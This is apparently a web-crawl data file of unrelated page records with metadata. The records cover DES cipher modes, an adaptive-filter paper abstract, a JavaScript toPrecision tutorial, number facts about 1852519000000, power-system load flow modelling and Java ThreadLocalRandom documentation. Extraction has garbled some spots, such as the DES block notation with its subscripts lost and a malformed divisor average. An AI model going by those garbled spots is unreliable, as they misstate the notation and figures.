[ "DES Encryption Operation Mode Introduction\n\nThis section describes what are DES encryption operation modes and notations used to describe how each operation mode works.\n\nDES encryption algorithm defines how a single 64-bit plaintext block can be encrypted. It does not define how a real plaintext message with an arbitrary number of bytes should be padded and arranged into 64-bit input blocks for the encryption process. It does not define how one input block should be coupled with other blocks from the same original plaintext message to improve the encryption strength.\n\n(FIPS) Federal Information Processing Standards Publication 81 published in 1980 provided the following block encryption operation modes to address how blocks of the same plaintext message should be coupled:\n\n• ECB - Electronic Code Book operation mode.\n• CBC - Cipher Block Chaining operation mode.\n• CFB - Cipher Feedback operation mode\n• OFB - Output Feedback operation mode\n\nSee http://www.itl.nist.gov/fipspubs/fip81.htm for details.\n\nIn order to describe these operation modes, we need to define the following notations:\n\nP = P, P, P, ..., P[i], ... - Representing the original plaintext message, P, being arranged into multiple 64-bit plaintext blocks. P[i] represents plaintext block number i.\n\nEk(P[i]) - Representing the DES encryption algorithm applied on a single 64-bit plaintext block, P[i], with a predefined key, k.\n\nC = C, C, C, ..., C[i], ... - Representing the final ciphertext message, C, being regrouped from multiple 64-bit ciphertext blocks. C[i] represents ciphertext block number i.\n\nIV - Called \"Initial Vector\", representing a predefined 64-bit initial value.\n\nWith these notations, we are ready to describe different operation modes that can be applied the DES encryption algorithm.\n\nTable of Contents" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.74000585,"math_prob":0.8072995,"size":3149,"snap":"2019-13-2019-22","text_gpt3_token_len":674,"char_repetition_ratio":0.14594595,"word_repetition_ratio":0.01330377,"special_character_ratio":0.20482694,"punctuation_ratio":0.11588785,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97020715,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-05-22T21:59:57Z\",\"WARC-Record-ID\":\"<urn:uuid:a7930bed-a660-45ce-8d68-00e316d6ed45>\",\"Content-Length\":\"14690\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ed40be5b-31c4-481d-a525-4e1e72ff7d01>\",\"WARC-Concurrent-To\":\"<urn:uuid:fb3f0114-d4c8-4119-9f82-3aac81fb6ed5>\",\"WARC-IP-Address\":\"74.208.236.35\",\"WARC-Target-URI\":\"http://herongyang.com/Cryptography/DES-Mode-Encryption-Operation-Mode-Introduction.html\",\"WARC-Payload-Digest\":\"sha1:PGJSGUVC75WNNQXJ2CLLIZ7KGIHOZ6PF\",\"WARC-Block-Digest\":\"sha1:P2WZGO2FYHGGHP4NNDKM2LBD5ARMC65Y\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-22/CC-MAIN-2019-22_segments_1558232256958.53_warc_CC-MAIN-20190522203319-20190522225319-00210.warc.gz\"}"}
https://link.springer.com/article/10.1007%2Fs00034-016-0356-x
[ "Circuits, Systems, and Signal Processing\n\n, Volume 36, Issue 3, pp 1322–1339\n\nNonparametric Variable Step-Size LMAT Algorithm\n\nShort Paper\n\nAbstract\n\nThis paper proposes a nonparametric variable step-size least mean absolute third (NVSLMAT) algorithm to improve the capability of the adaptive filtering algorithm against the impulsive noise and other types of noise. The step-size of the NVSLMAT is obtained using the instantaneous value of a current error estimate and a posterior error estimate. This approach is different from the traditional method of nonparametric variance estimate. In the NVSLMAT algorithm, fewer parameters need to be set, thereby reducing the complexity considerably. Additionally, the mean of the additive noise does not necessarily equal zero in the proposed algorithm. In addition, the mean convergence and steady-state mean-square deviation of the NVSLMAT algorithm are derived and the computational complexity of NVSLMAT is analyzed theoretically. Furthermore, the experimental results in system identification applications presented illustrate the principle and efficiency of the NVSLMAT algorithm.\n\nKeywords\n\nLMAT Variable step-size Impulsive noise Nonparametric Most of the noise densities System identification\n\nReferences\n\n1. 1.\nW.P. Ang, B. Farhang-Boroujeny, A new class of gradient adaptive step-size LMS algorithms. IEEE Trans. Signal Process. 49(4), 805–810 (2001)\n2. 2.\nJ. Benesty, H. Rey, L. Rey, Vega, S. Tressens, A nonparametric VSS NLMS algorithm. IEEE Signal Process. Lett. 13(10), 581–584 (2006)\n3. 3.\nD. Bismor, LMS algorithm step-size adjustment for fast convergence. Arch. Acoust. 37(1), 31–40 (2012)\n4. 4.\nS.H. Cho, S.D. Kim, H.P. Moom, J.Y. NA, The least mean absolute third (LMAT) adaptive algorithm: mean and mean-squared convergence properties. In Proceedings of Sixth Western Pacific Reg. Acoust. Conf., Hong Kong, 22(10), 2303–2309 (1997)Google Scholar\n5. 5.\nP.S.R. Diniz, Adaptive Filtering, vol. Fourth (Springer, Boston, 2013)\n6. 6.\nE. Eweda, Dependence of the stability of the least mean fourth algorithm on target weights nonstationarity. IEEE Trans. Signal Process. 62(7), 1634–1643 (2014)\n7. 7.\nE. Eweda, N. Bershad, Stochastic analysis of a stable normalized least mean fourth algorithm for adaptive noise canceling with a white gaussian reference. IEEE Trans. Signal Process. 60(12), 6235–6244 (2012)\n8. 8.\nX.Z. FU, Z. Liu, C.X. LI, Anti-interference performance improvement for sigmoid function variable step-size LMS adaptive algorithm. J. Beijing Univ. Posts Telecommun. 34(6), 112–120 (2011)Google Scholar\n9. 9.\nK. Hirano, Rayleigh Distribution (Wiley, London, 2014)\n10. 10.\nS.D. Kim, S.S. Kim, S.H. Cho, Least mean absolute third (LMAT) adaptive algorithm: part II. Perform. Eval. Algorithm 22(10), 2310–2316 (1997)Google Scholar\n11. 11.\nR.H. Kwong, E.W. Johnston, A variable step-size LMS algorithm. IEEE Trans. Signal Process. 40(7), 1633–1642 (1992)\n12. 12.\nY.H. Lee, D.M. Jin, D.K. Sang, S.H. Cho, Performance of least mean absolute third (LMAT) adaptive algorithm in various noise environments. Electron. Lett. 34(3), 241–243 (1998)\n13. 13.\nJ.C. Liu, X. Yu, H.R. Li, A nonparametric variable step-size NLMS algorithm for transversal filters. Appl. Math. Comput. 217(17), 7365–7371 (2011)\n14. 14.\nK. Mayyas, A variable step-size selective partial update LMS algorithm. Digit. Signal Process. 23, 75–85 (2013)\n15. 15.\nA.H. Sayed, Adaptive Filters (Wiley, Hoboken, 2008)\n16. 16.\nH.C. Shin, A.H. Sayed, W.J. 
Song, Variable step-size NLMS and affine projection algorithms. IEEE Signal Process. Lett. 11(2), 132–135 (2004)\n17. 17.\nM.R. Spiegel, Mathematical Handbook of Formulas and Tables (McGraw-Hill, New York, 2012)Google Scholar\n18. 18.\nP. Wang, P.Y. Kam, An automatic step-size adjustment algorithm for LMS adaptive filters and an application to channel estimation. Phys. Commun. 5, 280–286 (2012)\n19. 19.\nH.X. Wen, X.H. Lai, L. Chen, Z. Cai, Nonparametric VSS-APA based on precise background noise power estimate. J. Cent. South Univ. 22, 251–260 (2015)\n20. 20.\nJ.W. Yoo, J.W. Shin, P.G. Park, An improved NLMS algorithm in sparse systems against noisy input signals. IEEE Trans. Circuits Syst. II Expr. Br. 62(3), 271–275 (2015)\n21. 21.\nX. Yu, J.C. Liu, H.R. Li, An adaptive inertia weight particle swarm optimization algorithm for IIR digital filter. In Proceedings of the 2009 International Conference on Artificial Intelligence and Computational Intelligence (AICI2009), pp. 114–118 (2009)Google Scholar\n22. 22.\nA. Zerguine, Convergence and steady-state analysis of the normalized least mean fourth algorithm. Digit. Signal Process. 17(1), 17–31 (2007)\n23. 23.\nH. Zhao, Y. Yu, S. Gao, Z. He, A new normalized LMAT algorithm and its performance analysis. Signal Process. 105(12), 399–409 (2014)", null, "" ]
[ null, "https://link.springer.com/track/controlled/article/denied/10.1007/s00034-016-0356-x", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6688067,"math_prob":0.8738269,"size":5315,"snap":"2019-43-2019-47","text_gpt3_token_len":1438,"char_repetition_ratio":0.1711542,"word_repetition_ratio":0.0098730605,"special_character_ratio":0.27883348,"punctuation_ratio":0.2513661,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95575076,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-21T15:47:13Z\",\"WARC-Record-ID\":\"<urn:uuid:ce55f61f-ba5f-4587-a22f-ee5767c56cf6>\",\"Content-Length\":\"87412\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d80497d3-1f61-4687-b97f-1e57be49f785>\",\"WARC-Concurrent-To\":\"<urn:uuid:cf217a7c-a41f-44ea-82bb-8830a5e1dc5b>\",\"WARC-IP-Address\":\"151.101.248.95\",\"WARC-Target-URI\":\"https://link.springer.com/article/10.1007%2Fs00034-016-0356-x\",\"WARC-Payload-Digest\":\"sha1:Z4HN6LQPFB5T3DNZRIFIKTRTGAA6URHP\",\"WARC-Block-Digest\":\"sha1:NINWIFKT2ZVMRGJ7344UVYWCUCSP5NP4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570987779528.82_warc_CC-MAIN-20191021143945-20191021171445-00459.warc.gz\"}"}
https://tutorialspoint.dev/language/javascript/javascript-toprecision-function
[ "# JavaScript | toPrecision( ) Function\n\nThe toPrecision() method in Javascript is used to format a number to a specific precision or length. If the formatted number requires more number of digits than original number then decimals and nulls are also added to create the specified length.\n\nSyntax:\n\n`number.toPrecision(value)`\n\nThe toPrecision() function is used with a number as shown in above syntax using the ‘.’ operator. This function will format a number to a specified length.\n\nParameters: This function accepts a single parameter value. This parameter is also optional and it represents the value of the number of significant digits the user wants in the formatted number.\n\nReturn Value: The toPrecision() method in JavaScript returns a string in which the number is formatted to the specified precision.\n\nBelow are some examples to illustrates toPrecision() function:\n\n1. Passing no arguments in the toPrecision() method: If no arguments is passed to the toPrecision() function then the formatted number will be exactly the same as input number. Though, it will be represented as a string rather than a number.\n `       `  `<``script` `type``=``\"text/javascript\"``> ` `    ``var num=213.45689; ` `    ``document.write(num.toPrecision());           ` ` `\n\n/div>\n\nOutput:\n\n`213.45689`\n2. Passing an argument in the toPrecision() method: If the length of precision passed to the toPrecision() function is smalller than the original number then the number is rounded off to that precision.\n `<``script` `type``=``\"text/javascript\"``> ` `    ``var num=213.45689; ` `    ``document.write(num.toPrecision(4));           ` ` `\n\nOutput:\n\n`213.5`\n3. Passing an argument which results in addition of null in the output: If the length of precision passed to the toPrecision() function is greater than the original number then zero’s are appended to the input number to meet the specified precision.\n `<``script` `type``=``\"text/javascript\"``> ` `    ``var num=213.45689; ` `    ``document.write(num.toPrecision(12));   ` ` `  `    ``var num2 = 123; ` `    ``document.write(num2.toPrecision(5));         ` ` `\n\nOutput:\n\n```213.456890000\n123.00\n```\n\nNote: If the precision specified is not in between 1 and 100 (inclusive), it results in a RangeError.\n\n## tags:\n\nJavaScript JavaScript-Misc JavaScript-Numbers" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5661592,"math_prob":0.92196953,"size":2372,"snap":"2022-40-2023-06","text_gpt3_token_len":518,"char_repetition_ratio":0.19130068,"word_repetition_ratio":0.23333333,"special_character_ratio":0.23819561,"punctuation_ratio":0.12383178,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99257505,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-07T05:21:24Z\",\"WARC-Record-ID\":\"<urn:uuid:412237b1-1437-4e8e-82f7-16057b488edd>\",\"Content-Length\":\"23669\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c760af4a-89bc-4f26-85f0-740b424c5bf6>\",\"WARC-Concurrent-To\":\"<urn:uuid:b6ff80f3-3a0e-4c9e-a0dd-912f658f35bf>\",\"WARC-IP-Address\":\"104.21.79.77\",\"WARC-Target-URI\":\"https://tutorialspoint.dev/language/javascript/javascript-toprecision-function\",\"WARC-Payload-Digest\":\"sha1:H73FAMI3BSA77VAUAQA2NKOEIVPX2BZ3\",\"WARC-Block-Digest\":\"sha1:LFMRLFLXXBRLF7KZVXQMS7QKYRM4OYOY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337971.74_warc_CC-MAIN-20221007045521-20221007075521-00794.warc.gz\"}"}
https://metanumbers.com/1852519000000
[ "1852519000000 (number)\n\n1,852,519,000,000 (one trillion eight hundred fifty-two billion five hundred nineteen million) is an even thirteen-digits composite number following 1852518999999 and preceding 1852519000001. In scientific notation, it is written as 1.852519 × 1012. The sum of its digits is 31. It has a total of 14 prime factors and 196 positive divisors. There are 702,000,000,000 positive integers (up to 1852519000000) that are relatively prime to 1852519000000.\n\nBasic properties\n\n• Is Prime? No\n• Number parity Even\n• Number length 13\n• Sum of Digits 31\n• Digital Root 4\n\nName\n\nShort name 1 trillion 852 billion 519 million one trillion eight hundred fifty-two billion five hundred nineteen million\n\nNotation\n\nScientific notation 1.852519 × 1012 1.852519 × 1012\n\nPrime Factorization of 1852519000000\n\nPrime Factorization 26 × 56 × 19 × 97501\n\nComposite number\nDistinct Factors Total Factors Radical ω(n) 4 Total number of distinct prime factors Ω(n) 14 Total number of prime factors rad(n) 18525190 Product of the distinct prime numbers λ(n) 1 Returns the parity of Ω(n), such that λ(n) = (-1)Ω(n) μ(n) 0 Returns: 1, if n has an even number of prime factors (and is square free) −1, if n has an odd number of prime factors (and is square free) 0, if n has a squared prime factor Λ(n) 0 Returns log(p) if n is a power pk of any prime p (for any k >= 1), else returns 0\n\nThe prime factorization of 1,852,519,000,000 is 26 × 56 × 19 × 97501. Since it has a total of 14 prime factors, 1,852,519,000,000 is a composite number.\n\nDivisors of 1852519000000\n\n196 divisors\n\n Even divisors 168 28 14 14\nTotal Divisors Sum of Divisors Aliquot Sum τ(n) 196 Total number of the positive divisors of n σ(n) 4.83695e+12 Sum of all the positive divisors of n s(n) 2.98443e+12 Sum of the proper positive divisors of n A(n) 2.46783e+10 Returns the sum of divisors (σ(n)) divided by the total number of divisors (τ(n)) G(n) 1.36107e+06 Returns the nth root of the product of n divisors H(n) 75.0666 Returns the total number of divisors (τ(n)) divided by the sum of the reciprocal of each divisors\n\nThe number 1,852,519,000,000 can be divided by 196 positive divisors (out of which 168 are even, and 28 are odd). The sum of these divisors (counting 1,852,519,000,000) is 4,836,951,367,480, the average is 246,783,233,03.,469.\n\nOther Arithmetic Functions (n = 1852519000000)\n\n1 φ(n) n\nEuler Totient Carmichael Lambda Prime Pi φ(n) 702000000000 Total number of positive integers not greater than n that are coprime to n λ(n) 11700000 Smallest positive number such that aλ(n) ≡ 1 (mod n) for all a coprime to n π(n) ≈ 68059911446 Total number of primes less than or equal to n r2(n) 0 The number of ways n can be represented as the sum of 2 squares\n\nThere are 702,000,000,000 positive integers (less than 1,852,519,000,000) that are coprime with 1,852,519,000,000. 
And there are approximately 68,059,911,446 prime numbers less than or equal to 1,852,519,000,000.\n\nDivisibility of 1852519000000\n\nm: 2 3 4 5 6 7 8 9\nn mod m: 0 1 0 0 4 4 0 4\n\nThe number 1,852,519,000,000 is divisible by 2, 4, 5 and 8.\n\n• Abundant\n\n• Polite\n• Practical\n\n• Frugal\n\nBase conversion (1852519000000)\n\nBase System Value\n2 Binary 11010111101010010101111001010011111000000\n3 Ternary 20120002200020022210110211\n4 Quaternary 122331102233022133000\n5 Quinary 220322424331000000\n6 Senary 3535011355203504\n8 Octal 32752257123700\n10 Decimal 1852519000000\n12 Duodecimal 25b044a46594\n20 Vigesimal 3c75c3f000\n36 Base36 nn19zcn4\n\nBasic calculations (n = 1852519000000)\n\nMultiplication\n\nn×y: n×2 = 3705038000000, n×3 = 5557557000000, n×4 = 7410076000000, n×5 = 9262595000000\n\nDivision\n\nn÷y: n÷2 ≈ 9.2626e+11, n÷3 ≈ 6.17506e+11, n÷4 ≈ 4.6313e+11, n÷5 ≈ 3.70504e+11\n\nExponentiation\n\nn^y: n^2 = 3431826645361000000000000, n^3 = 6357524065237514359000000000000000000, n^4 = 11777434123809734862820321000000000000000000000000, n^5 = 21817920485605886218337038238599000000000000000000000000000000\n\nNth Root\n\ny√n: 2√n ≈ 1.36107e+06, 3√n ≈ 12281.6, 4√n ≈ 1166.65, 5√n ≈ 284.153\n\n1852519000000 as geometric shapes\n\nCircle (radius = n)\n\nDiameter 3.70504e+12, Circumference 1.16397e+13, Area 1.07814e+25\n\nSphere (radius = n)\n\nVolume 2.66303e+37, Surface area 4.31256e+25, Circumference 1.16397e+13\n\nSquare (Length = n)\n\nPerimeter 7.41008e+12, Area 3.43183e+24, Diagonal 2.61986e+12\n\nCube (Length = n)\n\nSurface area 2.0591e+25, Volume 6.35752e+36, Space diagonal 3.20866e+12\n\nEquilateral Triangle (Length = n)\n\nPerimeter 5.55756e+12, Area 1.48602e+24, Height 1.60433e+12\n\nTriangular Pyramid (Length = n)\n\nSurface area 5.9441e+24, Volume 7.49241e+35, Height 1.51258e+12\n\nCryptographic Hash Functions\n\nmd5 3f1452ce1388c98b8450f82db8af53dc\nsha1 09f37a033afa70b10934150d4073130fee535546\nsha256 a46d5e3e5d0befd8cf91f246f6c69594e0aeb3bac99d0f722839e61e5d30da1a\nsha512 4c3dae0fb4115c1325324a7981be022a48044c47f19c74c76900ae9fbebe4a7b266de5a36c11b52813de322f4b6848f13bd2fc29b66f4491340d79666b49e1f6\nripemd-160 57b71ccaf9bf6f9f4535d7cb895d92603c3d9030" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.61455595,"math_prob":0.99695665,"size":5295,"snap":"2022-05-2022-21","text_gpt3_token_len":1920,"char_repetition_ratio":0.15101115,"word_repetition_ratio":0.041968163,"special_character_ratio":0.51671386,"punctuation_ratio":0.11638418,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9953759,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-29T12:37:52Z\",\"WARC-Record-ID\":\"<urn:uuid:569f4382-5035-4f70-b4a3-98e100a5ad6d>\",\"Content-Length\":\"41864\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9ff20502-96da-449b-8294-9a4d5a7de9dc>\",\"WARC-Concurrent-To\":\"<urn:uuid:4521d687-da30-42ec-a06e-8d5133373cd4>\",\"WARC-IP-Address\":\"46.105.53.190\",\"WARC-Target-URI\":\"https://metanumbers.com/1852519000000\",\"WARC-Payload-Digest\":\"sha1:OBVD7S2HYUJXO7OP3N4HGUN7QZNZDOIS\",\"WARC-Block-Digest\":\"sha1:EPT2VGVQVZIVDWQ5KQEEQRPMDDMWLQGZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320306181.43_warc_CC-MAIN-20220129122405-20220129152405-00274.warc.gz\"}"}
https://www.electrotechnik.net/2018/01/
[ "## Modelling the Components for a Load Flow Analysis\n\nThe Load Flow Analysis is done to determine the flow of real and reactive between different buses in a power system.  It also helps in determining the voltage and current at different locations.\n\nTo conduct a Load Flow Analysis, the components in a power system need to be modelled.  The modelling is done by developing equivalent circuits of the components, such as the generator, transmission lines and line capacitances.\n\nThe Generator equivalent circuit is shown below.\n\nThe Thevenin equivalent circuit is as shown below.", null, "This consists of a voltage source and a resistance and an inductance in series with the load.\n\nE = V + IZ\n\nwhere\n\nZ is the steady stage impedance\nV is the voltage and\nI is the current\n\nThe Norton equivalent circuit\n\nThe Norton equivalent circuit consists of a power source and an admittance in parallel.", null, "INorton = V/Z\n\nINorton = YV", null, "The load is modelled as a resistance and inductance in a series circuit that is earth\n\nTransmission lines\n\nTransmission lines are modelled as\n\nShort transmission lines (less than 80 km)\n\nShort lines that are less than 80 kms long are modelled as a resistance and reactance in series with the load.  The line capacitances are neglected.\n\nMedium (80 to 250 km)\n\nMedium lines are modelled as a resistance and reactance in series.  The admittance is in parallel in two sections.", null, "Long lines ( 250 km and above)\n\nLong lines are also modelled as a resistance and reactance in series.  The admittance is in parallel in two sections.", null, "" ]
[ null, "https://1.bp.blogspot.com/-DWCo3RY5lu4/WiJBuiXDh1I/AAAAAAAAONo/_1Sk-M5IyLUh67aiIiI6zJ8_E79S_2uOQCLcBGAs/s1600/schemeit-project%2B%25285%2529.png", null, "https://2.bp.blogspot.com/-t-8DbTd1UCY/WiJBucLkWLI/AAAAAAAAONk/wbVGP5pN-Mgj4Fi--zvUpOkSbFtFTTKqACLcBGAs/s1600/schemeit-project%2B%25284%2529.png", null, "https://2.bp.blogspot.com/-QVDw-2nyv_E/WiJBtQ4Po9I/AAAAAAAAONg/AgNNPS4YXvIrIaUBwO8wCWHwbJX9mV8nACLcBGAs/s1600/schemeit-project%2B%25283%2529.png", null, "https://1.bp.blogspot.com/-Sais5Jn2Pt4/WiJBtOcNn6I/AAAAAAAAONY/iL_zhyaOfOoFFnlEgjRSmINsAXBC4QwCQCLcBGAs/s400/schemeit-project%2B%25282%2529.png", null, "https://2.bp.blogspot.com/-Mhr-aInUcC4/WiJBtUvRjUI/AAAAAAAAONc/PUFIX2Nvm6sh7BAX2CwTElDIFbreQGbYACLcBGAs/s400/schemeit-project%2B%25281%2529.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9417405,"math_prob":0.9856167,"size":1272,"snap":"2023-40-2023-50","text_gpt3_token_len":282,"char_repetition_ratio":0.14826499,"word_repetition_ratio":0.14746544,"special_character_ratio":0.2028302,"punctuation_ratio":0.06465517,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99351937,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,4,null,4,null,4,null,4,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-25T07:40:38Z\",\"WARC-Record-ID\":\"<urn:uuid:4a79c428-eb2d-4b84-be78-c20ca7c1f1ae>\",\"Content-Length\":\"91627\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cf2fc77d-193c-4389-b2cf-5a844218d909>\",\"WARC-Concurrent-To\":\"<urn:uuid:3a87f1ff-fa86-469f-8e29-69d686dd4e19>\",\"WARC-IP-Address\":\"172.253.115.121\",\"WARC-Target-URI\":\"https://www.electrotechnik.net/2018/01/\",\"WARC-Payload-Digest\":\"sha1:HN62KZN5FBDSWVGF4S2YUYJNEXXJ2MWQ\",\"WARC-Block-Digest\":\"sha1:RWFUCUSJIIW7YEAVYTUALCXCRMMWHLFV\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233506686.80_warc_CC-MAIN-20230925051501-20230925081501-00759.warc.gz\"}"}
https://curry.ateneo.net/javadocs/api/java/util/concurrent/ThreadLocalRandom.html
[ "Java™ Platform\nStandard Ed. 8\ncompact1, compact2, compact3\njava.util.concurrent\n\n• All Implemented Interfaces:\nSerializable\n\n```public class ThreadLocalRandom\nextends Random```\nA random number generator isolated to the current thread. Like the global `Random` generator used by the `Math` class, a `ThreadLocalRandom` is initialized with an internally generated seed that may not otherwise be modified. When applicable, use of `ThreadLocalRandom` rather than shared `Random` objects in concurrent programs will typically encounter much less overhead and contention. Use of `ThreadLocalRandom` is particularly appropriate when multiple tasks (for example, each a `ForkJoinTask`) use random numbers in parallel in thread pools.\n\nUsages of this class should typically be of the form: `ThreadLocalRandom.current().nextX(...)` (where `X` is `Int`, `Long`, etc). When all usages are of this form, it is never possible to accidently share a `ThreadLocalRandom` across multiple threads.\n\nThis class also provides additional commonly used bounded random generation methods.\n\nInstances of `ThreadLocalRandom` are not cryptographically secure. Consider instead using `SecureRandom` in security-sensitive applications. Additionally, default-constructed instances do not use a cryptographically random seed unless the system property `java.util.secureRandomSeed` is set to `true`.\n\nSince:\n1.7\nSerialized Form\n• ### Method Summary\n\nAll Methods\nModifier and Type Method and Description\n`static ThreadLocalRandom` `current()`\nReturns the current thread's `ThreadLocalRandom`.\n`DoubleStream` `doubles()`\nReturns an effectively unlimited stream of pseudorandom `double` values, each between zero (inclusive) and one (exclusive).\n`DoubleStream` ```doubles(double randomNumberOrigin, double randomNumberBound)```\nReturns an effectively unlimited stream of pseudorandom `double` values, each conforming to the given origin (inclusive) and bound (exclusive).\n`DoubleStream` `doubles(long streamSize)`\nReturns a stream producing the given `streamSize` number of pseudorandom `double` values, each between zero (inclusive) and one (exclusive).\n`DoubleStream` ```doubles(long streamSize, double randomNumberOrigin, double randomNumberBound)```\nReturns a stream producing the given `streamSize` number of pseudorandom `double` values, each conforming to the given origin (inclusive) and bound (exclusive).\n`IntStream` `ints()`\nReturns an effectively unlimited stream of pseudorandom `int` values.\n`IntStream` ```ints(int randomNumberOrigin, int randomNumberBound)```\nReturns an effectively unlimited stream of pseudorandom `int` values, each conforming to the given origin (inclusive) and bound (exclusive).\n`IntStream` `ints(long streamSize)`\nReturns a stream producing the given `streamSize` number of pseudorandom `int` values.\n`IntStream` ```ints(long streamSize, int randomNumberOrigin, int randomNumberBound)```\nReturns a stream producing the given `streamSize` number of pseudorandom `int` values, each conforming to the given origin (inclusive) and bound (exclusive).\n`LongStream` `longs()`\nReturns an effectively unlimited stream of pseudorandom `long` values.\n`LongStream` `longs(long streamSize)`\nReturns a stream producing the given `streamSize` number of pseudorandom `long` values.\n`LongStream` ```longs(long randomNumberOrigin, long randomNumberBound)```\nReturns an effectively unlimited stream of pseudorandom `long` values, each conforming to the given origin (inclusive) and bound (exclusive).\n`LongStream` 
```longs(long streamSize, long randomNumberOrigin, long randomNumberBound)```\nReturns a stream producing the given `streamSize` number of pseudorandom `long`, each conforming to the given origin (inclusive) and bound (exclusive).\n`protected int` `next(int bits)`\nGenerates the next pseudorandom number.\n`boolean` `nextBoolean()`\nReturns a pseudorandom `boolean` value.\n`double` `nextDouble()`\nReturns a pseudorandom `double` value between zero (inclusive) and one (exclusive).\n`double` `nextDouble(double bound)`\nReturns a pseudorandom `double` value between 0.0 (inclusive) and the specified bound (exclusive).\n`double` ```nextDouble(double origin, double bound)```\nReturns a pseudorandom `double` value between the specified origin (inclusive) and bound (exclusive).\n`float` `nextFloat()`\nReturns a pseudorandom `float` value between zero (inclusive) and one (exclusive).\n`double` `nextGaussian()`\nReturns the next pseudorandom, Gaussian (\"normally\") distributed `double` value with mean `0.0` and standard deviation `1.0` from this random number generator's sequence.\n`int` `nextInt()`\nReturns a pseudorandom `int` value.\n`int` `nextInt(int bound)`\nReturns a pseudorandom `int` value between zero (inclusive) and the specified bound (exclusive).\n`int` ```nextInt(int origin, int bound)```\nReturns a pseudorandom `int` value between the specified origin (inclusive) and the specified bound (exclusive).\n`long` `nextLong()`\nReturns a pseudorandom `long` value.\n`long` `nextLong(long bound)`\nReturns a pseudorandom `long` value between zero (inclusive) and the specified bound (exclusive).\n`long` ```nextLong(long origin, long bound)```\nReturns a pseudorandom `long` value between the specified origin (inclusive) and the specified bound (exclusive).\n`void` `setSeed(long seed)`\nThrows `UnsupportedOperationException`.\n• ### Methods inherited from class java.util.Random\n\n`nextBytes`\n• ### Methods inherited from class java.lang.Object\n\n`clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait`\n• ### Method Detail\n\n• #### current\n\n`public static ThreadLocalRandom current()`\nReturns the current thread's `ThreadLocalRandom`.\nReturns:\nthe current thread's `ThreadLocalRandom`\n• #### setSeed\n\n`public void setSeed(long seed)`\nThrows `UnsupportedOperationException`. Setting seeds in this generator is not supported.\nOverrides:\n`setSeed` in class `Random`\nParameters:\n`seed` - the initial seed\nThrows:\n`UnsupportedOperationException` - always\n• #### next\n\n`protected int next(int bits)`\nDescription copied from class: `Random`\nGenerates the next pseudorandom number. Subclasses should override this, as this is used by all other methods.\n\nThe general contract of `next` is that it returns an `int` value and if the argument `bits` is between `1` and `32` (inclusive), then that many low-order bits of the returned value will be (approximately) independently chosen bit values, each of which is (approximately) equally likely to be `0` or `1`. The method `next` is implemented by class `Random` by atomically updating the seed to\n\n`` (seed * 0x5DEECE66DL + 0xBL) & ((1L << 48) - 1)``\nand returning\n`` (int)(seed >>> (48 - bits))`.`\nThis is a linear congruential pseudorandom number generator, as defined by D. H. Lehmer and described by Donald E. 
Knuth in The Art of Computer Programming, Volume 3: Seminumerical Algorithms, section 3.2.1.\nOverrides:\n`next` in class `Random`\nParameters:\n`bits` - random bits\nReturns:\nthe next pseudorandom value from this random number generator's sequence\n• #### nextInt\n\n`public int nextInt()`\nReturns a pseudorandom `int` value.\nOverrides:\n`nextInt` in class `Random`\nReturns:\na pseudorandom `int` value\n• #### nextInt\n\n`public int nextInt(int bound)`\nReturns a pseudorandom `int` value between zero (inclusive) and the specified bound (exclusive).\nOverrides:\n`nextInt` in class `Random`\nParameters:\n`bound` - the upper bound (exclusive). Must be positive.\nReturns:\na pseudorandom `int` value between zero (inclusive) and the bound (exclusive)\nThrows:\n`IllegalArgumentException` - if `bound` is not positive\n• #### nextInt\n\n```public int nextInt(int origin,\nint bound)```\nReturns a pseudorandom `int` value between the specified origin (inclusive) and the specified bound (exclusive).\nParameters:\n`origin` - the least value returned\n`bound` - the upper bound (exclusive)\nReturns:\na pseudorandom `int` value between the origin (inclusive) and the bound (exclusive)\nThrows:\n`IllegalArgumentException` - if `origin` is greater than or equal to `bound`\n• #### nextLong\n\n`public long nextLong()`\nReturns a pseudorandom `long` value.\nOverrides:\n`nextLong` in class `Random`\nReturns:\na pseudorandom `long` 